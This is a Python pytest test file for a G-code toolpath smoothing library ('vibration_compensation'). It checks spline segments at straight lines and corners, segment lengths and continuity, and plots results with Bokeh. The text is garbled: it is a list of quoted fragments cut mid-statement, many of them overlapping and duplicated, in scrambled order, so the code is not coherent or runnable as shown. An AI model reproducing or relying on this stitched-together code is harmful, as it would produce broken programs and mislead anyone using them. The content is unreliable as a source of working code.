"l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20",
"line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg =",
"msg = \"The start point of the spline segment is not on the",
"self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end",
"0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1",
"1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start,",
"assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"\"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on()",
"np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10,",
"the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg",
"generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0,",
"check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data",
"False) if start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start",
"check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\"",
"abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20",
"of the spline segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point),",
"else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) /",
"0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5)",
"generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start",
"end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance",
"= \"The start point of the spline segment does not match the line",
"start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid",
"Data import pytest from numpy.testing import * import numpy as np import scipy",
"s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data",
"test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert",
"X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0,",
"200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100",
"+ np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid",
"plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ],",
"lineb, point): mid = (lineb - linea) * 0.5 + linea return np.linalg.norm(point",
"np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter):",
"l, s, start, end, corner): self.data = data self.s = s self.start =",
"50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1",
"start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data,",
"plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ],",
"np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01)",
"> 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4,",
"data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end)",
"100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)",
"= generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"== \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start == \"middle\"",
"elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def",
"data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\")",
"\"The start point of the spline segment is not on the middle of",
"== \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10",
"check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\"",
"end point of the spline segment is not on the middle of the",
"else: assert False, \"Invalid start type\" if start == \"middle\" or end ==",
"elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def",
"point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of",
"data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end =",
"the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg",
"self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1,",
"def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter):",
"not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid,",
"middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\",
"\"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb -",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter):",
"def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ -",
"start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start",
"assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\",",
"the spline segment is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point,",
"== \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data =",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data,",
"pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker",
"import numpy as np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\")",
"end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line is very",
"else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif",
"= \"The spline start distance does not match\" if line <= 1.0: line_dist",
"xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start",
"self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s,",
"Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30",
"\"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line is very short straight_segment(data,",
"- self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s,",
"pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point of",
"s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\")",
"y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1)",
"s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(",
"s, start, end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if",
"self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start",
"fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point)",
"pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1",
"\"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"start, end, corner): self.data = data self.s = s self.start = start self.end",
"= self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length *",
"check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\"",
"not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0,",
"assert False, \"Invalid start type\" if start == \"middle\" or end == \"middle\":",
"Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5",
"the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end,",
"of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5)",
"checker = SegmentChecker(data, l, s, start, end, False) if start == \"start\": checker.check_start_point_start()",
"request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250),",
"check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\",",
"abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200",
"middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid,",
"plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ],",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0,",
"plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0],",
"check_point_on_middle_of_line(self): msg = \"The middle point of the spline segment is not on",
"class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data = data self.s",
"= np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0,",
"end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1,",
"= os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret",
"assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ],",
"\"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data",
"\"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret)",
"end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1",
"is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error",
"= data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point =",
"X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\")",
"l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100",
"l, s, start, end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order()",
"[] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data",
"read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p =",
"l, s, start, end): checker = SegmentChecker(data, l, s, start, end, False) if",
") p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb,",
"assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg",
"path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] +",
"def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\":",
"np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data)",
"where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and",
"def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01)",
"point of the spline segment is not on the end of the line\"",
"def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01)",
"segment is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start,",
"end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of",
"straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert",
"False, \"Invalid start type\" if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal()",
"test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert",
"data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle(",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data)",
"check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of the corner spline is",
"\"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 +",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter):",
"\"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1,",
"data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert",
"match\" if line <= 1.0: line_dist = self.start_line_dist + self.line_length * line else:",
"numpy as np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def",
"\"Invalid start type\" if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else:",
"np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50",
"Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0,",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2,",
"0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12),",
"is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) ==",
"point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg =",
"data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self,",
"line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point",
"point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point,",
"\"The start point of the spline segment is not on the line\" assert",
"def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01)",
") check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100",
"yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\")",
"is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) ==",
"match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1],",
"l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10",
"+ np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100",
"checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start == \"start\" and end",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1])",
"np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l,",
"corner): self.data = data self.s = s self.start = start self.end = end",
"def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def",
"corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else:",
"end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(),",
"test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"point of the spline segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start),",
"SegmentChecker(data, l, s, start, end, False) if start == \"start\": checker.check_start_point_start() elif start",
"\"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret",
"pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10",
"- mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data =",
"end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1])",
"abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0",
"\"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1,",
") ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2,",
"xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline start distance does not",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter):",
"= generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0,",
"np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def",
"\"The spline start distance does not match\" if line <= 1.0: line_dist =",
"start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start ==",
"on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3),",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1,",
"self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline start distance",
"not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0,",
"pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1",
"test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert",
"spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start,",
"s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
